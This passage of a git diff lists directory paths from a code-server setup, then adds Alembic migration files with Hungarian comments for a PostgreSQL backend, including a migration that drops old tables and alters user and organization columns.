+./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/future +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/plugin +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/fixtures +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/pool +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/declarative +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util +./code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info +./code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/anyio +./code-server-config/.local/lib/python3.12/site-packages/anyio/_backends +./code-server-config/.local/lib/python3.12/site-packages/anyio/streams +./code-server-config/.local/lib/python3.12/site-packages/anyio/_core +./code-server-config/.local/lib/python3.12/site-packages/anyio/abc +./code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info +./code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info +./code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info +./code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/httpx +./code-server-config/.local/lib/python3.12/site-packages/httpx/_transports +./code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info +./code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/soupsieve +./code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info +./code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/greenlet +./code-server-config/.local/lib/python3.12/site-packages/greenlet/platform +./code-server-config/.local/lib/python3.12/site-packages/greenlet/tests +./code-server-config/.local/lib/python3.12/site-packages/dotenv +./code-server-config/.local/lib/python3.12/site-packages/asyncpg +./code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol +./code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/codecs +./code-server-config/.local/lib/python3.12/site-packages/asyncpg/_testbase +./code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto +./code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs +./code-server-config/.local/lib/python3.12/site-packages/asyncpg/exceptions +./code-server-config/.local/lib/python3.12/site-packages/h11 +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy-2.0.45.dist-info +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy-2.0.45.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/idna-3.11.dist-info +./code-server-config/.local/lib/python3.12/site-packages/idna-3.11.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/h11-0.16.0.dist-info +./code-server-config/.local/lib/python3.12/site-packages/h11-0.16.0.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/certifi-2026.1.4.dist-info +./code-server-config/.local/lib/python3.12/site-packages/certifi-2026.1.4.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/httpcore +./code-server-config/.local/lib/python3.12/site-packages/httpcore/_sync +./code-server-config/.local/lib/python3.12/site-packages/httpcore/_async +./code-server-config/.local/lib/python3.12/site-packages/httpcore/_backends +./code-server-config/.local/lib/python3.12/site-packages/soupsieve-2.8.3.dist-info +./code-server-config/.local/lib/python3.12/site-packages/soupsieve-2.8.3.dist-info/licenses +./code-server-config/.local/include +./code-server-config/.local/include/python3.12 +./code-server-config/.local/include/python3.12/greenlet +./code-server-config/.local/bin +./code-server-config/.ssh +./code-server-config/.config +./code-server-config/.config/code-server +./code-server-config/extensions +./code-server-config/data +./code-server-config/data/Machine +./code-server-config/data/User +./code-server-config/data/User/History +./code-server-config/data/User/History/6ca6cf1a +./code-server-config/data/User/History/-706ef310 +./code-server-config/data/User/History/-16684355 +./code-server-config/data/User/History/-313e58 +./code-server-config/data/User/History/-52e5c41d +./code-server-config/data/User/History/30eb9f94 +./code-server-config/data/User/History/-1768a9b0 +./code-server-config/data/User/History/2e6ecb37 +./code-server-config/data/User/History/-26d8d76b +./code-server-config/data/User/History/-10d36f1c +./code-server-config/data/User/History/e7633ef +./code-server-config/data/User/History/2434083a +./code-server-config/data/User/History/563f6285 +./code-server-config/data/User/History/1231c811 +./code-server-config/data/User/History/-5bd368a0 +./code-server-config/data/User/History/10134b39 +./code-server-config/data/User/History/-4c88f193 +./code-server-config/data/User/History/-2ef9c2df +./code-server-config/data/User/History/5bff933a +./code-server-config/data/User/History/-72cc77ef +./code-server-config/data/User/History/97f3a5f +./code-server-config/data/User/History/-5314da0c +./code-server-config/data/User/History/-3487e1e +./code-server-config/data/User/History/37941b6f +./code-server-config/data/User/History/-7a78fe9d +./code-server-config/data/User/History/-412f821c +./code-server-config/data/User/History/5144c62f +./code-server-config/data/User/History/55969fe3 +./code-server-config/data/User/History/-4ace1ff2 +./code-server-config/data/User/History/-22981f1a +./code-server-config/data/User/History/-719dbe4 +./code-server-config/data/User/History/3ae47db8 +./code-server-config/data/User/History/-6713540d +./code-server-config/data/User/History/-4958fed3 +./code-server-config/data/User/History/71ceecfb +./code-server-config/data/User/History/16d1374a +./code-server-config/data/User/History/359c80de +./code-server-config/data/User/History/-5e83fa91 +./code-server-config/data/User/History/-638902d7 +./code-server-config/data/User/History/639c2122 +./code-server-config/data/User/History/-1e547221 +./code-server-config/data/User/History/-6f62bdcf +./code-server-config/data/User/caches +./code-server-config/data/User/caches/CachedConfigurations +./code-server-config/data/User/caches/CachedConfigurations/folder +./code-server-config/data/User/caches/CachedConfigurations/folder/-5879b260 +./code-server-config/data/User/caches/CachedConfigurations/folder/-5c4fcefd +./code-server-config/data/User/caches/CachedConfigurations/folder/3e658ed7 +./code-server-config/data/User/caches/CachedConfigurations/folder/-285bda86 +./code-server-config/data/User/Backups +./code-server-config/data/User/Backups/-54297bf2 +./code-server-config/data/User/Backups/-54297bf2/vscode-remote +./code-server-config/data/User/snippets +./code-server-config/data/User/globalStorage +./code-server-config/data/User/globalStorage/vscode.json-language-features +./code-server-config/data/User/globalStorage/vscode.json-language-features/json-schema-cache +./code-server-config/data/User/workspaceStorage +./code-server-config/data/User/workspaceStorage/-63ce429 +./code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions +./code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f +./code-server-config/data/User/workspaceStorage/-63ce429/chatEditingSessions/a91fca11-9919-49b2-9aab-55a4263a881f/contents +./code-server-config/data/User/workspaceStorage/-63ce429/chatSessions +./code-server-config/data/User/workspaceStorage/64cc123a +./code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions +./code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673 +./code-server-config/data/User/workspaceStorage/64cc123a/chatEditingSessions/ff708a20-4b56-4c2d-8af1-bf0a107df673/contents +./code-server-config/data/User/workspaceStorage/64cc123a/chatSessions +./code-server-config/data/User/workspaceStorage/-54297bf2 +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1 +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/db5da8e2-e0b3-43bd-a73f-59c06d1367d1/contents +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/d21d60af-afdf-4015-ac22-8468113828ba/contents +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/98c877cb-9c52-4901-988e-890d63101faf/contents +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2 +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/508a716e-f283-436b-b9c7-f68336e877d2/contents +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/2fe3f8f1-90c9-4db0-8659-7ddaaa21ab7c/contents +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/df31879f-7816-4000-922a-1ae16dfa748e/contents +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426 +./code-server-config/data/User/workspaceStorage/-54297bf2/chatEditingSessions/daa34a05-12c3-4f1d-b7c1-6dbcf59e3426/contents +./code-server-config/data/User/workspaceStorage/-54297bf2/chatSessions +./code-server-config/data/User/workspaceStorage/787b6db1 +./code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions +./code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019 +./code-server-config/data/User/workspaceStorage/787b6db1/chatEditingSessions/d5306add-574b-4ca9-80a2-e738a2954019/contents +./code-server-config/data/User/workspaceStorage/787b6db1/chatSessions +./code-server-config/data/User/workspaceStorage/787b6db1-1 +./code-server-config/data/CachedProfilesData +./code-server-config/data/CachedProfilesData/__default__profile__ +./code-server-config/data/logs +./code-server-config/data/logs/20260120T003918 +./code-server-config/data/logs/20260120T003918/exthost1 +./code-server-config/data/logs/20260120T003918/exthost1/vscode.git +./code-server-config/data/logs/20260120T003918/exthost1/vscode.github +./code-server-config/data/logs/20260120T003918/exthost1/vscode.github-authentication +./code-server-config/data/logs/20260120T003918/exthost2 +./code-server-config/data/logs/20260120T003918/exthost2/vscode.git +./code-server-config/data/logs/20260120T003918/exthost2/vscode.github +./code-server-config/data/logs/20260120T003918/exthost2/vscode.github-authentication +./code-server-config/data/logs/20260120T172343 +./code-server-config/data/logs/20260120T172343/exthost1 +./code-server-config/data/logs/20260120T172343/exthost1/vscode.git +./code-server-config/data/logs/20260120T172343/exthost1/vscode.github +./code-server-config/data/logs/20260120T172343/exthost1/vscode.github-authentication +./code-server-config/data/logs/20260120T004510 +./code-server-config/data/logs/20260120T004510/exthost3 +./code-server-config/data/logs/20260120T004510/exthost3/vscode.git +./code-server-config/data/logs/20260120T004510/exthost3/vscode.github +./code-server-config/data/logs/20260120T004510/exthost3/vscode.github-authentication +./code-server-config/data/logs/20260120T004510/exthost1 +./code-server-config/data/logs/20260120T004510/exthost1/vscode.git +./code-server-config/data/logs/20260120T004510/exthost1/vscode.github +./code-server-config/data/logs/20260120T004510/exthost1/vscode.github-authentication +./code-server-config/data/logs/20260120T004510/exthost4 +./code-server-config/data/logs/20260120T004510/exthost4/vscode.git +./code-server-config/data/logs/20260120T004510/exthost4/vscode.github +./code-server-config/data/logs/20260120T004510/exthost4/vscode.github-authentication +./code-server-config/data/logs/20260120T004510/exthost2 +./code-server-config/data/logs/20260120T004510/exthost2/vscode.git +./code-server-config/data/logs/20260120T004510/exthost2/vscode.github +./code-server-config/data/logs/20260120T004510/exthost2/vscode.github-authentication +./code-server-config/data/logs/20260120T175427 +./code-server-config/data/logs/20260120T175427/exthost5 +./code-server-config/data/logs/20260120T175427/exthost5/vscode.git +./code-server-config/data/logs/20260120T175427/exthost5/vscode.github +./code-server-config/data/logs/20260120T175427/exthost5/vscode.github-authentication +./code-server-config/data/logs/20260120T175427/exthost3 +./code-server-config/data/logs/20260120T175427/exthost3/vscode.git +./code-server-config/data/logs/20260120T175427/exthost3/vscode.github +./code-server-config/data/logs/20260120T175427/exthost3/vscode.github-authentication +./code-server-config/data/logs/20260120T175427/exthost7 +./code-server-config/data/logs/20260120T175427/exthost7/vscode.git +./code-server-config/data/logs/20260120T175427/exthost7/vscode.github +./code-server-config/data/logs/20260120T175427/exthost7/vscode.github-authentication +./code-server-config/data/logs/20260120T175427/exthost6 +./code-server-config/data/logs/20260120T175427/exthost6/vscode.git +./code-server-config/data/logs/20260120T175427/exthost6/vscode.github +./code-server-config/data/logs/20260120T175427/exthost6/vscode.github-authentication +./code-server-config/data/logs/20260120T175427/exthost1 +./code-server-config/data/logs/20260120T175427/exthost1/vscode.git +./code-server-config/data/logs/20260120T175427/exthost1/vscode.github +./code-server-config/data/logs/20260120T175427/exthost1/vscode.github-authentication +./code-server-config/data/logs/20260120T175427/exthost4 +./code-server-config/data/logs/20260120T175427/exthost4/vscode.json-language-features +./code-server-config/data/logs/20260120T175427/exthost4/vscode.git +./code-server-config/data/logs/20260120T175427/exthost4/vscode.github +./code-server-config/data/logs/20260120T175427/exthost4/vscode.html-language-features +./code-server-config/data/logs/20260120T175427/exthost4/vscode.github-authentication +./code-server-config/data/logs/20260120T175427/exthost2 +./code-server-config/data/logs/20260120T175427/exthost2/vscode.git +./code-server-config/data/logs/20260120T175427/exthost2/vscode.github +./code-server-config/data/logs/20260120T175427/exthost2/vscode.html-language-features +./code-server-config/data/logs/20260120T175427/exthost2/vscode.github-authentication +./code-server-config/.cache +./code-server-config/.cache/pip +./code-server-config/.cache/pip/http-v2 +./code-server-config/.cache/pip/http-v2/3 +./code-server-config/.cache/pip/http-v2/3/0 +./code-server-config/.cache/pip/http-v2/3/0/e +./code-server-config/.cache/pip/http-v2/3/0/e/f +./code-server-config/.cache/pip/http-v2/3/0/e/f/1 +./code-server-config/.cache/pip/http-v2/3/d +./code-server-config/.cache/pip/http-v2/3/d/b +./code-server-config/.cache/pip/http-v2/3/d/b/a +./code-server-config/.cache/pip/http-v2/3/d/b/a/4 +./code-server-config/.cache/pip/http-v2/a +./code-server-config/.cache/pip/http-v2/a/e +./code-server-config/.cache/pip/http-v2/a/e/5 +./code-server-config/.cache/pip/http-v2/a/e/5/f +./code-server-config/.cache/pip/http-v2/a/e/5/f/a +./code-server-config/.cache/pip/http-v2/a/0 +./code-server-config/.cache/pip/http-v2/a/0/3 +./code-server-config/.cache/pip/http-v2/a/0/3/e +./code-server-config/.cache/pip/http-v2/a/0/3/e/7 +./code-server-config/.cache/pip/http-v2/a/b +./code-server-config/.cache/pip/http-v2/a/b/0 +./code-server-config/.cache/pip/http-v2/a/b/0/c +./code-server-config/.cache/pip/http-v2/a/b/0/c/9 +./code-server-config/.cache/pip/http-v2/a/b/d +./code-server-config/.cache/pip/http-v2/a/b/d/d +./code-server-config/.cache/pip/http-v2/a/b/d/d/d +./code-server-config/.cache/pip/http-v2/2 +./code-server-config/.cache/pip/http-v2/2/c +./code-server-config/.cache/pip/http-v2/2/c/5 +./code-server-config/.cache/pip/http-v2/2/c/5/0 +./code-server-config/.cache/pip/http-v2/2/c/5/0/9 +./code-server-config/.cache/pip/http-v2/2/8 +./code-server-config/.cache/pip/http-v2/2/8/8 +./code-server-config/.cache/pip/http-v2/2/8/8/5 +./code-server-config/.cache/pip/http-v2/2/8/8/5/1 +./code-server-config/.cache/pip/http-v2/7 +./code-server-config/.cache/pip/http-v2/7/5 +./code-server-config/.cache/pip/http-v2/7/5/2 +./code-server-config/.cache/pip/http-v2/7/5/2/4 +./code-server-config/.cache/pip/http-v2/7/5/2/4/8 +./code-server-config/.cache/pip/http-v2/7/b +./code-server-config/.cache/pip/http-v2/7/b/f +./code-server-config/.cache/pip/http-v2/7/b/f/d +./code-server-config/.cache/pip/http-v2/7/b/f/d/a +./code-server-config/.cache/pip/http-v2/6 +./code-server-config/.cache/pip/http-v2/6/8 +./code-server-config/.cache/pip/http-v2/6/8/0 +./code-server-config/.cache/pip/http-v2/6/8/0/d +./code-server-config/.cache/pip/http-v2/6/8/0/d/4 +./code-server-config/.cache/pip/http-v2/6/f +./code-server-config/.cache/pip/http-v2/6/f/7 +./code-server-config/.cache/pip/http-v2/6/f/7/1 +./code-server-config/.cache/pip/http-v2/6/f/7/1/9 +./code-server-config/.cache/pip/http-v2/6/d +./code-server-config/.cache/pip/http-v2/6/d/d +./code-server-config/.cache/pip/http-v2/6/d/d/7 +./code-server-config/.cache/pip/http-v2/6/d/d/7/f +./code-server-config/.cache/pip/http-v2/5 +./code-server-config/.cache/pip/http-v2/5/5 +./code-server-config/.cache/pip/http-v2/5/5/2 +./code-server-config/.cache/pip/http-v2/5/5/2/5 +./code-server-config/.cache/pip/http-v2/5/5/2/5/6 +./code-server-config/.cache/pip/http-v2/9 +./code-server-config/.cache/pip/http-v2/9/3 +./code-server-config/.cache/pip/http-v2/9/3/6 +./code-server-config/.cache/pip/http-v2/9/3/6/e +./code-server-config/.cache/pip/http-v2/9/3/6/e/f +./code-server-config/.cache/pip/http-v2/9/1 +./code-server-config/.cache/pip/http-v2/9/1/a +./code-server-config/.cache/pip/http-v2/9/1/a/c +./code-server-config/.cache/pip/http-v2/9/1/a/c/4 +./code-server-config/.cache/pip/http-v2/9/1/1 +./code-server-config/.cache/pip/http-v2/9/1/1/8 +./code-server-config/.cache/pip/http-v2/9/1/1/8/d +./code-server-config/.cache/pip/http-v2/e +./code-server-config/.cache/pip/http-v2/e/2 +./code-server-config/.cache/pip/http-v2/e/2/0 +./code-server-config/.cache/pip/http-v2/e/2/0/7 +./code-server-config/.cache/pip/http-v2/e/2/0/7/4 +./code-server-config/.cache/pip/http-v2/e/0 +./code-server-config/.cache/pip/http-v2/e/0/b +./code-server-config/.cache/pip/http-v2/e/0/b/4 +./code-server-config/.cache/pip/http-v2/e/0/b/4/f +./code-server-config/.cache/pip/http-v2/8 +./code-server-config/.cache/pip/http-v2/8/e +./code-server-config/.cache/pip/http-v2/8/e/c +./code-server-config/.cache/pip/http-v2/8/e/c/f +./code-server-config/.cache/pip/http-v2/8/e/c/f/f +./code-server-config/.cache/pip/http-v2/8/8 +./code-server-config/.cache/pip/http-v2/8/8/f +./code-server-config/.cache/pip/http-v2/8/8/f/7 +./code-server-config/.cache/pip/http-v2/8/8/f/7/d +./code-server-config/.cache/pip/http-v2/8/0 +./code-server-config/.cache/pip/http-v2/8/0/e +./code-server-config/.cache/pip/http-v2/8/0/e/9 +./code-server-config/.cache/pip/http-v2/8/0/e/9/4 +./code-server-config/.cache/pip/http-v2/8/f +./code-server-config/.cache/pip/http-v2/8/f/0 +./code-server-config/.cache/pip/http-v2/8/f/0/a +./code-server-config/.cache/pip/http-v2/8/f/0/a/d +./code-server-config/.cache/pip/http-v2/8/b +./code-server-config/.cache/pip/http-v2/8/b/2 +./code-server-config/.cache/pip/http-v2/8/b/2/4 +./code-server-config/.cache/pip/http-v2/8/b/2/4/2 +./code-server-config/.cache/pip/http-v2/0 +./code-server-config/.cache/pip/http-v2/0/a +./code-server-config/.cache/pip/http-v2/0/a/e +./code-server-config/.cache/pip/http-v2/0/a/e/8 +./code-server-config/.cache/pip/http-v2/0/a/e/8/4 +./code-server-config/.cache/pip/http-v2/0/5 +./code-server-config/.cache/pip/http-v2/0/5/a +./code-server-config/.cache/pip/http-v2/0/5/a/7 +./code-server-config/.cache/pip/http-v2/0/5/a/7/4 +./code-server-config/.cache/pip/http-v2/0/4 +./code-server-config/.cache/pip/http-v2/0/4/8 +./code-server-config/.cache/pip/http-v2/0/4/8/4 +./code-server-config/.cache/pip/http-v2/0/4/8/4/7 +./code-server-config/.cache/pip/http-v2/f +./code-server-config/.cache/pip/http-v2/f/0 +./code-server-config/.cache/pip/http-v2/f/0/e +./code-server-config/.cache/pip/http-v2/f/0/e/2 +./code-server-config/.cache/pip/http-v2/f/0/e/2/8 +./code-server-config/.cache/pip/http-v2/b +./code-server-config/.cache/pip/http-v2/b/8 +./code-server-config/.cache/pip/http-v2/b/8/0 +./code-server-config/.cache/pip/http-v2/b/8/0/2 +./code-server-config/.cache/pip/http-v2/b/8/0/2/b +./code-server-config/.cache/pip/http-v2/d +./code-server-config/.cache/pip/http-v2/d/6 +./code-server-config/.cache/pip/http-v2/d/6/b +./code-server-config/.cache/pip/http-v2/d/6/b/5 +./code-server-config/.cache/pip/http-v2/d/6/b/5/a +./code-server-config/.cache/pip/http-v2/d/e +./code-server-config/.cache/pip/http-v2/d/e/e +./code-server-config/.cache/pip/http-v2/d/e/e/3 +./code-server-config/.cache/pip/http-v2/d/e/e/3/2 +./code-server-config/.cache/pip/http-v2/d/b +./code-server-config/.cache/pip/http-v2/d/b/9 +./code-server-config/.cache/pip/http-v2/d/b/9/a +./code-server-config/.cache/pip/http-v2/d/b/9/a/3 +./code-server-config/.cache/pip/http-v2/d/b/4 +./code-server-config/.cache/pip/http-v2/d/b/4/f +./code-server-config/.cache/pip/http-v2/d/b/4/f/1 +./code-server-config/.cache/pip/http-v2/1 +./code-server-config/.cache/pip/http-v2/1/2 +./code-server-config/.cache/pip/http-v2/1/2/9 +./code-server-config/.cache/pip/http-v2/1/2/9/c +./code-server-config/.cache/pip/http-v2/1/2/9/c/8 +./code-server-config/.cache/pip/http-v2/1/c +./code-server-config/.cache/pip/http-v2/1/c/b +./code-server-config/.cache/pip/http-v2/1/c/b/6 +./code-server-config/.cache/pip/http-v2/1/c/b/6/2 +./code-server-config/.cache/pip/http-v2/1/6 +./code-server-config/.cache/pip/http-v2/1/6/0 +./code-server-config/.cache/pip/http-v2/1/6/0/d +./code-server-config/.cache/pip/http-v2/1/6/0/d/3 +./code-server-config/.cache/pip/http-v2/1/9 +./code-server-config/.cache/pip/http-v2/1/9/9 +./code-server-config/.cache/pip/http-v2/1/9/9/d +./code-server-config/.cache/pip/http-v2/1/9/9/d/1 +./code-server-config/.cache/pip/http-v2/1/4 +./code-server-config/.cache/pip/http-v2/1/4/a +./code-server-config/.cache/pip/http-v2/1/4/a/a +./code-server-config/.cache/pip/http-v2/1/4/a/a/f +./code-server-config/.cache/pip/http-v2/4 +./code-server-config/.cache/pip/http-v2/4/b +./code-server-config/.cache/pip/http-v2/4/b/e +./code-server-config/.cache/pip/http-v2/4/b/e/0 +./code-server-config/.cache/pip/http-v2/4/b/e/0/7 +./code-server-config/.cache/Microsoft +./code-server-config/.cache/Microsoft/DeveloperTools +./code-server-config/workspace diff --git a/migrations/README b/migrations/README new file mode 100755 index 0000000..98e4f9c --- /dev/null +++ b/migrations/README @@ -0,0 +1 @@ +Generic single-database configuration. \ No newline at end of file diff --git a/migrations/__pycache__/env.cpython-312.pyc b/migrations/__pycache__/env.cpython-312.pyc new file mode 100755 index 0000000..fa1c160 Binary files /dev/null and b/migrations/__pycache__/env.cpython-312.pyc differ diff --git a/migrations/env.py b/migrations/env.py new file mode 100755 index 0000000..777ef41 --- /dev/null +++ b/migrations/env.py @@ -0,0 +1,75 @@ +import asyncio +from logging.config import fileConfig +import os +import sys + +from sqlalchemy import pool +from sqlalchemy.ext.asyncio import async_engine_from_config +from alembic import context + +# --- ÚTVONAL JAVÍTÁS --- +# Az aktuális fájl (env.py) helyéből kiindulva meghatározzuk a könyvtárakat +current_dir = os.path.dirname(os.path.realpath(__file__)) +project_root = os.path.realpath(os.path.join(current_dir, '..')) +backend_dir = os.path.join(project_root, 'backend') + +# Mindkét útvonalat betesszük a keresőbe, hogy a 'backend.app' és a sima 'app' is működjön +sys.path.insert(0, project_root) +sys.path.insert(0, backend_dir) + +# Most már az Alembic megtalálja a konfigurációt és a modelleket +try: + from app.core.config import settings + from app.db.base import Base + from app.models import * # Fontos, hogy minden modell be legyen importálva! +except ImportError as e: + print(f"Hiba az importálásnál: {e}") + print(f"Próbált útvonalak: {sys.path}") + raise + +config = context.config + +# Dinamikus adatbázis URL a .env alapján (App User jelszavával) +config.set_main_option("sqlalchemy.url", settings.DATABASE_URL) + +if config.config_file_name is not None: + fileConfig(config.config_file_name) + +target_metadata = Base.metadata + +def do_run_migrations(connection): + context.configure( + connection=connection, + target_metadata=target_metadata, + include_schemas=True, # Adatbázis sémák (pl. 'data') támogatása + version_table_schema='public' # Alembic tábla a public-ban marad + ) + + with context.begin_transaction(): + context.run_migrations() + +async def run_migrations_online() -> None: + """Aszinkron kapcsolat felépítése és migráció futtatása""" + connectable = async_engine_from_config( + config.get_section(config.config_ini_section, {}), + prefix="sqlalchemy.", + poolclass=pool.NullPool, + ) + + async with connectable.connect() as connection: + await connection.run_sync(do_run_migrations) + + await connectable.dispose() + +if context.is_offline_mode(): + url = config.get_main_option("sqlalchemy.url") + context.configure( + url=url, + target_metadata=target_metadata, + literal_binds=True, + include_schemas=True + ) + with context.begin_transaction(): + context.run_migrations() +else: + asyncio.run(run_migrations_online()) \ No newline at end of file diff --git a/migrations/script.py.mako b/migrations/script.py.mako new file mode 100755 index 0000000..1101630 --- /dev/null +++ b/migrations/script.py.mako @@ -0,0 +1,28 @@ +"""${message} + +Revision ID: ${up_revision} +Revises: ${down_revision | comma,n} +Create Date: ${create_date} + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +${imports if imports else ""} + +# revision identifiers, used by Alembic. +revision: str = ${repr(up_revision)} +down_revision: Union[str, Sequence[str], None] = ${repr(down_revision)} +branch_labels: Union[str, Sequence[str], None] = ${repr(branch_labels)} +depends_on: Union[str, Sequence[str], None] = ${repr(depends_on)} + + +def upgrade() -> None: + """Upgrade schema.""" + ${upgrades if upgrades else "pass"} + + +def downgrade() -> None: + """Downgrade schema.""" + ${downgrades if downgrades else "pass"} diff --git a/migrations/versions/10b73fee8967_fix_roles_and_universal_vehicles.py b/migrations/versions/10b73fee8967_fix_roles_and_universal_vehicles.py new file mode 100755 index 0000000..60bc499 --- /dev/null +++ b/migrations/versions/10b73fee8967_fix_roles_and_universal_vehicles.py @@ -0,0 +1,38 @@ +from alembic import op +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +revision = "10b73fee8967" +down_revision = "13d050e8cf6d" +branch_labels = None +depends_on = None + +def upgrade() -> None: + # 1. Régi táblák eltávolítása kényszerítve + tables_to_drop = [ + "user_badges", "badges", "points_ledger", "votes", "user_scores", + "user_stats", "competitions", "level_configs", "point_rules", + "regional_settings", "translations", "system_settings", "vehicles" + ] + for table in tables_to_drop: + op.execute(f"DROP TABLE IF EXISTS data.{table} CASCADE") + + # 2. Szerepkör oszlop típusának módosítása + op.execute("ALTER TABLE data.organization_members ALTER COLUMN role TYPE orguserrole USING role::text::orguserrole") + + # 3. Új oszlopok hozzáadása (Szigorúan Sima Idézőjellel a DEFAULT-nál!) + op.execute("ALTER TABLE data.users ADD COLUMN IF NOT EXISTS hashed_password VARCHAR") + op.execute("ALTER TABLE data.users ADD COLUMN IF NOT EXISTS role VARCHAR DEFAULT \u0027user\u0027") + op.execute("ALTER TABLE data.users ADD COLUMN IF NOT EXISTS is_superuser BOOLEAN DEFAULT FALSE") + op.execute("ALTER TABLE data.users ADD COLUMN IF NOT EXISTS is_company BOOLEAN DEFAULT FALSE") + op.execute("ALTER TABLE data.users ADD COLUMN IF NOT EXISTS updated_at TIMESTAMP WITH TIME ZONE") + + op.execute("ALTER TABLE data.organizations ADD COLUMN IF NOT EXISTS theme VARCHAR DEFAULT \u0027system\u0027") + op.execute("ALTER TABLE data.organizations ADD COLUMN IF NOT EXISTS is_active BOOLEAN DEFAULT TRUE") + + # 4. Takarítás + op.execute("ALTER TABLE data.users DROP COLUMN IF EXISTS password_hash") + op.execute("ALTER TABLE data.users DROP COLUMN IF EXISTS is_email_verified") + +def downgrade() -> None: + pass diff --git a/migrations/versions/13bd03551ebf_add_verification_tokens_and_legal_tables.py b/migrations/versions/13bd03551ebf_add_verification_tokens_and_legal_tables.py new file mode 100755 index 0000000..ff91dee --- /dev/null +++ b/migrations/versions/13bd03551ebf_add_verification_tokens_and_legal_tables.py @@ -0,0 +1,607 @@ +"""Add verification tokens and legal tables + +Revision ID: 13bd03551ebf +Revises: 8d450e9dc77f +Create Date: 2026-01-26 09:34:26.147993 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision: str = '13bd03551ebf' +down_revision: Union[str, Sequence[str], None] = '8d450e9dc77f' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Upgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('email_logs', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('email', sa.String(), nullable=True), + sa.Column('type', sa.String(), nullable=True), + 